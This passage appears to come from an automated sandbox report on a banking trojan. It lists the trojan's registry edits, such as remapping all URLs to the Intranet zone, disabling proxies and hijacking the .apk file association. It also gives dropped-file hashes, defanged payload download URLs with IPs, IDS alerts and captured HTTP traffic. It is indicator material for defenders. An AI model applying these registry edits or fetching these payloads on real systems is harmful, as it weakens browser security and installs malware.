[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan-Banker modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Banker modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Banker modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-Banker deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process Config.exe:1952 makes changes in the system registry.
The Trojan-Banker creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D9 C3 05 6D DF 96 B5 E2 5C 60 89 A1 86 EB FC BD"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\gssoft\gswb]
"ServicePath" = "%Documents and Settings%\%current user%\Application Data\686eae580b7cb0d09a8525ff1a5a4803\"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\gssoft\gswb]
"ServiceName" = "0a5b509cdd3b6170bcbbd2667002b7e7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\gssoft\gswb]
"ServiceExe" = "3026bf8d9e37080c8abcaaf6df47dbf3"

The process Power.exe:2536 makes changes in the system registry.
The Trojan-Banker creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AD 04 04 29 6E B2 32 70 7D 48 3E 3C 1E 72 8C E4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process Power.exe:1772 makes changes in the system registry.
The Trojan-Banker creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8C 60 CD 44 DC 1E CA FA A5 57 C7 D4 65 AB F0 80"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process WJSpeed.exe:2880 makes changes in the system registry.
The Trojan-Banker creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8D 77 0E 40 DE 2C 35 5E 88 76 E4 E7 3F 35 A9 D4"

The process WJSpeed.exe:2788 makes changes in the system registry.
The Trojan-Banker creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 22 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9F D6 85 9A DB 48 DC 04 59 35 19 DF 20 CC 8D E6"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan-Banker modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Banker modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Banker modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-Banker deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process WJSpeed.exe:3020 makes changes in the system registry.
The Trojan-Banker creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0B DF 7D 30 97 30 6A 8C 2C 1B 5A CD 82 56 E6 B2"

The process ApkReg.exe:2652 makes changes in the system registry.
The Trojan-Banker creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1F 96 32 84 DF C7 DE D3 1A 7D 95 55 41 77 06 6A"

[HKCR\.apk]
"(Default)" = "GSApkFile"

[HKCR\GSApkFile\shell\open\command]
"(Default)" = "%Program Files%\gssoft\gswb\2.8.1.1120\ApkReg.exe install %1"

[HKCR\GSApkFile\DefaultIcon]
"(Default)" = "%Program Files%\gssoft\gswb\2.8.1.1120\ApkReg.exe"

[HKCR\GSApkFile]
"(Default)" = "GSApkFile"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.apk]
"Progid" = "GSApkFile"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.apk\UserChoice]
"Progid" = "GSApkFile"

The process wjplay.exe:1456 makes changes in the system registry.
The Trojan-Banker creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "08 51 13 75 7E EC 4D 46 F9 F4 3A 7F FB D6 81 64"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan-Banker modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Banker modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Banker modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-Banker deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
c17103ae9072a06da581dec998343fc1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nseF.tmp\System.dll
4ef209b45569e43632fc12df01c53305 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nseF.tmp\metadl.dll
0a3f484a26c2800cba1cd835d54b6ade c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nseF.tmp\setup_qd304.exe
bed1cd437a6664a063858cb87a992227 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsk12.tmp\System.dll
342516a9a38becea86fc40df0c850a6d c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\axuls[1].exe
4bb48f7e0eff2cd69c26743b18cd583a c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\axult[1].exe
39bb33f853ea6ff05dd9fef71af31820 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup_qd304[1].exe
8f8388ff0f9508a4967de0e33ad72393 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\setup_open_341[1].exe
32c86e6a9e00d52b0547aa3b4adb6437 c:\Program Files\gssoft\gswb\2.8.1.1120\ApkReg.exe
46a902ffbdad4277fa543e2931ce4eaf c:\Program Files\gssoft\gswb\2.8.1.1120\Config.exe
aeb26abf54b585561612e35ffde5fa64 c:\Program Files\gssoft\gswb\2.8.1.1120\Expand.dll
23cc67aac8a96fc87a8117135d40e3f4 c:\Program Files\gssoft\gswb\2.8.1.1120\ImeReg32.exe
7ac234234b0d66b319f603d2f5c3174c c:\Program Files\gssoft\gswb\2.8.1.1120\ImeReg64.exe
3d35a6947229635b0b843a3144b17a8f c:\Program Files\gssoft\gswb\2.8.1.1120\ImeUtil.exe
7a67b3f770826f2cf85d5e35af576ab5 c:\Program Files\gssoft\gswb\2.8.1.1120\MBManager.exe
6c876ab526c7201271fe84501cfb82b0 c:\Program Files\gssoft\gswb\2.8.1.1120\Mutual.exe
e8dd3be6a4c0eb5d57a772e85ecaca5a c:\Program Files\gssoft\gswb\2.8.1.1120\Power.exe
c81281f0b1d528a75ec939d74deacd10 c:\Program Files\gssoft\gswb\2.8.1.1120\Service.dll
d9e484ea02bc94ceeaad9332f4b299c5 c:\Program Files\gssoft\gswb\2.8.1.1120\SkinReg.exe
6c69f7343da82f96466f4eecddd9429d c:\Program Files\gssoft\gswb\2.8.1.1120\Statistics.dll
afa98c7b8342973574e42ae3545b6af9 c:\Program Files\gssoft\gswb\2.8.1.1120\Tool.exe
bdfe1cc3f07c227762d788fe061bb6bf c:\Program Files\gssoft\gswb\2.8.1.1120\WDJDriverPreinstaller.exe
7f42436f8f9710208f549b6f831fa1b5 c:\Program Files\gssoft\gswb\2.8.1.1120\WbUpd.exe
f47599011ca588a4c886b27a46684d9b c:\Program Files\gssoft\gswb\2.8.1.1120\WdjEngine.dll
2b32ae66afb22232832d09ae02564639 c:\Program Files\gssoft\gswb\2.8.1.1120\WdjRelated.dll
89d69647aeda90b26c9c07d93f50fd5e c:\Program Files\gssoft\gswb\2.8.1.1120\Wizard.exe
8530435a57f909880374c09775c2e6a6 c:\Program Files\gssoft\gswb\2.8.1.1120\aapt.exe
6b73135e96e9066f948535f0acd65a15 c:\Program Files\gssoft\gswb\2.8.1.1120\gswb32.ime
e59def245fe8e767c2e51c5e73a54ce1 c:\Program Files\gssoft\gswb\2.8.1.1120\gswb64.ime
c7cba18c39940d5a236f4cf8c437e0bb c:\Program Files\gssoft\gswb\2.8.1.1120\uninst.exe
925f6d296246408bcadbffaa1ee91b8d c:\Program Files\gssoft\gswb\2.8.1.1120\wdj_connection_wrapper.dll
342516a9a38becea86fc40df0c850a6d c:\Program Files\vsgrtaho\axuls.exe
4bb48f7e0eff2cd69c26743b18cd583a c:\Program Files\vsgrtaho\axult.exe
18507ce9bd6114ed575a40b8fc55839b c:\Program Files\vsgrtaho\d3dim.dll
7c8db6e5acc97e8f8064a2f5c6244c67 c:\Program Files\vsgrtaho\dciman32.dll
3da9208f5816252fedd948433e4b123d c:\Program Files\vsgrtaho\devmgr.dll
88441504bc80f3f8f8469e01e860f4e1 c:\Program Files\vsgrtaho\dmocx.dll
39bb33f853ea6ff05dd9fef71af31820 c:\Program Files\vsgrtaho\hzsoft\setup_qd304.exe
35c4650ee5f1c353b8bbdcd4c1a2abef c:\Program Files\vsgrtaho\ialmuDAN.dll
8f8388ff0f9508a4967de0e33ad72393 c:\Program Files\vsgrtaho\setup_open_341.exe
49e5fb3a44d171393fa72e5843c659bb c:\Program Files\vsgrtaho\vsgrtaho.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 67196 67584 4.54827 5c4d5ace2672731f58b9d31b4d21f13f
.rdata 73728 6101 6144 3.82125 019ad0f666e2ac17292e5d20e1bdf6c3
.data 81920 49140 512 2.45613 2821477811bfd11f4acd2c1da2aba6da
.CRT 131072 16 512 0.147711 324bcdad78da9eab2e1651550291e550
.rsrc 135168 15968 16384 2.48941 6de80162196c057ba9b8df5bec2720bc

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 10
805336f522845a87a6d31561b677a73d
98bd7ee8466484a43feafde8e5bd6c88
40794fca5f8bbb0c3d14f2776644f38b
f5954d52890b4483c7c48680951ac196
f8d68e474374caf20da173e457cbfce3
5bd62a5240b55b1989fb8fff09a28747
e8cbd7071ca3c2ab7c3e94510e096bd5
f35a332dcc6d77b96c2b505f16456e1b
cf08ae4c78e3493017a207ae7a352a1c
6b1c701c5e3c6c2caa5cc171ced8f7f1

URLs

URL IP
hxxp://adsvc2.9365.info/count/softcount/?pwb 211.101.12.49
hxxp://c.split.cnzz.com/stat.php?id=4327411&web_id=4327411&show=pic
hxxp://c.split.cnzz.com/core.php?web_id=4327411&show=pic&t=z
hxxp://z6.cnzz.com/stat.htm?id=4327411&r=&lg=en-us&ntime=none&repeatip=0&rtime=0&cnzz_eid=51257339-1399458444-&showp=1276x846&st=0&sin=&t=&rnd=680456921
hxxp://icon.cnzz.com/img/pic.gif 42.156.162.7
hxxp://pcookie.split.cnzz.com/9.gif?abc=1&rnd=557467190
hxxp://adsvc2.9365.info/ad/softad/popup.htm 211.101.12.49
hxxp://pcookie.split.cnzz.com/app.gif?&cna=jvjwC0DkbHMCAcGK9Oc9dLvc
hxxp://adsvc2.9365.info/ad/softad/pwb.htm 211.101.12.49
hxxp://adsvc2.9365.info/dls/axuls.exe 211.101.12.49
hxxp://cbjs.e.shifen.com/js/s.js
hxxp://adsvc2.9365.info/dls/axult.exe 211.101.12.49
hxxp://117.21.183.24/ifox/TGQgoEo3TGwCodVok5XuJEsdJwuYq5QdqwXYol-WaExNs91v/IFoxInstall-y-c203945859-run-s-x.exe
hxxp://download.grandcloud.cn/9291/15956/IFoxInstall-y-c203945859-run-s-x.exe 223.202.24.13
hxxp://08911.xdwscache.glb0.lxdns.com/qdn/setup_qd304.exe
hxxp://download.wuji.com/wuji/open/setup_open_341.exe 222.186.60.26
hxxp://08911.xdwscache.glb0.lxdns.com/qdn/setup_qd304.gif
hxxp://112.253.11.137/6d6dbaafbdb27b66f2773203ae554b05000000000007a3c8/9291/15956/IFoxInstall-y-c203945859-run-s-x.exe
hxxp://download.grandcloud.cn/9291/15474/setup_2949-14598.exe 223.202.24.13
hxxp://tclick.wauee.net/link/140896/setup_2948-140896.exe
hxxp://112.253.11.143/280cf9c20714744ccd17e57f66106dc70000000000370d38/9291/15474/setup_2949-14598.exe
hxxp://down.yinyue.fm/open/setup_2948-140896.exe 171.111.158.29
hxxp://down.guangsu.cn/qdn/setup_qd304.gif 222.84.167.30
hxxp://cnzz.mmstat.com/9.gif?abc=1&rnd=557467190 42.120.219.171
hxxp://hzs2.cnzz.com/stat.htm?id=4327411&r=&lg=en-us&ntime=none&repeatip=0&rtime=0&cnzz_eid=51257339-1399458444-&showp=1276x846&st=0&sin=&t=&rnd=680456921 42.156.140.19
hxxp://cbjs.baidu.com/js/s.js 123.125.65.120
hxxp://pcookie.cnzz.com/app.gif?&cna=jvjwC0DkbHMCAcGK9Oc9dLvc 42.120.219.171
hxxp://211.101.12.49/dls/axult.exe
hxxp://s85.cnzz.com/stat.php?id=4327411&web_id=4327411&show=pic 1.99.192.16
hxxp://down.guangsu.cn/qdn/setup_qd304.exe 222.84.167.30
hxxp://c.cnzz.com/core.php?web_id=4327411&show=pic&t=z 42.156.140.11
hxxp://211.101.12.49/dls/axuls.exe
hxxp://click.t3nlink.com/link/140896/setup_2948-140896.exe 61.147.97.228


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
SURICATA STREAM ESTABLISHED packet out of window
SURICATA STREAM Packet with invalid ack
SURICATA STREAM ESTABLISHED invalid ack

Traffic

GET /app.gif?&cna=jvjwC0DkbHMCAcGK9Oc9dLvc HTTP/1.1
Accept: */*
Referer: hXXp://adsvc2.9365.info/count/softcount/?pwb
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Host: pcookie.cnzz.com


HTTP/1.1 200 OK
Server: Tengine
Date: Wed, 07 May 2014 10:27:27 GMT
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive
P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"
Set-Cookie: cna=jvjwC0DkbHMCAcGK9Oc9dLvc; expires=Sat, 04-May-24 10:27:27 GMT; path=/; domain=.cnzz.com
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Pragma: no-cache
GIF89a.............!.......,...........L..;HTTP/1.1 200 OK..Server: Te
ngine..Date: Wed, 07 May 2014 10:27:27 GMT..Content-Type: image/gif..C
ontent-Length: 43..Connection: keep-alive..P3P: CP="NOI DSP COR CURa A
DMa DEVa PSAa PSDa OUR IND UNI PUR NAV"..Set-Cookie: cna=jvjwC0DkbHMCA
cGK9Oc9dLvc; expires=Sat, 04-May-24 10:27:27 GMT; path=/; domain=.cnzz
.com..Expires: Thu, 01 Jan 1970 00:00:01 GMT..Cache-Control: no-cache.
.Pragma: no-cache..GIF89a.............!.......,...........L..;..


GET /stat.htm?id=4327411&r=&lg=en-us&ntime=none&repeatip=0&rtime=0&cnzz_eid=51257339-1399458444-&showp=1276x846&st=0&sin=&t=&rnd=680456921 HTTP/1.1
Accept: */*
Referer: hXXp://adsvc2.9365.info/count/softcount/?pwb
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: hzs2.cnzz.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine/1.4.1
Date: Wed, 07 May 2014 10:27:25 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Tue, 28 May 2013 02:57:17 GMT
Connection: close
Accept-Ranges: bytes
GIF89a.............!.......,...........D..;..


GET /wuji/open/setup_open_341.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: download.wuji.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.5.10
Date: Wed, 07 May 2014 10:28:33 GMT
Content-Type: application/octet-stream
Content-Length: 1996944
Last-Modified: Fri, 25 Apr 2014 06:53:28 GMT
Connection: keep-alive
ETag: "535a0668-1e7890"
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$...................
......@.......F.......s.......r.......[.......K.........Q.....w.......
B.......E.....Rich............................PE..L....z6S............
.........F...............0....@.................................b.....
@.................................\........0..t2...........^.......p..
.'...2..............................`...@............0................
...............text............................... ..`.rdata.......0..
....................@..@.data...dA....... ..................@....rsrc.
..t2...0...4..................@..@.reloc..bB...p...D..................
@..B..................................................................
......................................................................
......................................................................
......................................................................
..............................................@3C...m.......U..V....@3
C...m...E..t.V..o.......^]............................U..j.h."C.d.....
P..p...C.3..E.SVP.E.d......}..=..D.3..]..G<S..lcC..G.tcC..G..cC..G.
.cC..G..cC..G,.....G0.._4h.cC.P.G8...Kz...G8............F.j,.G|.......
................h.cC.P......z........Y,.......E....X..X.P.E....!...E..
jX........n.....;......................@........@........BT........@U.
.E....3...8.t.0.@A...u.3.8.u.R........h......n......E..E..;.t.P.g.....
3..u..G4.......Q....w8......E..U.;.t.P.Ks.....S.E.P.O.Q.E......]..

<<< skipped >>>

GET /qdn/setup_qd304.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: down.guangsu.cn
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Tue, 06 May 2014 15:19:32 GMT
Content-Type: application/octet-stream
Last-Modified: Sat, 30 Nov 2013 07:58:50 GMT
Accept-Ranges: bytes
ETag: "0d9241a2edce1:0"
Server: Microsoft-IIS/7.5
Content-Length: 203872
Age: 1
X-Via: 1.1 zjjhdx31:8104 (Cdn Cache Server V2.0), 1.1 fra77:5 (Cdn Cache Server V2.0)
Connection: keep-alive
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................\..........<2.......p....@......
...........................Y........................................s.
.........xE...........................................................
................p...............................text...ZZ.......\.....
............. ..`.rdata.......p.......`..............@..@.data........
........r..............@....ndata.......@...........................rs
rc...xE.......F...v..............@..@.................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.
P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....N
U..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u
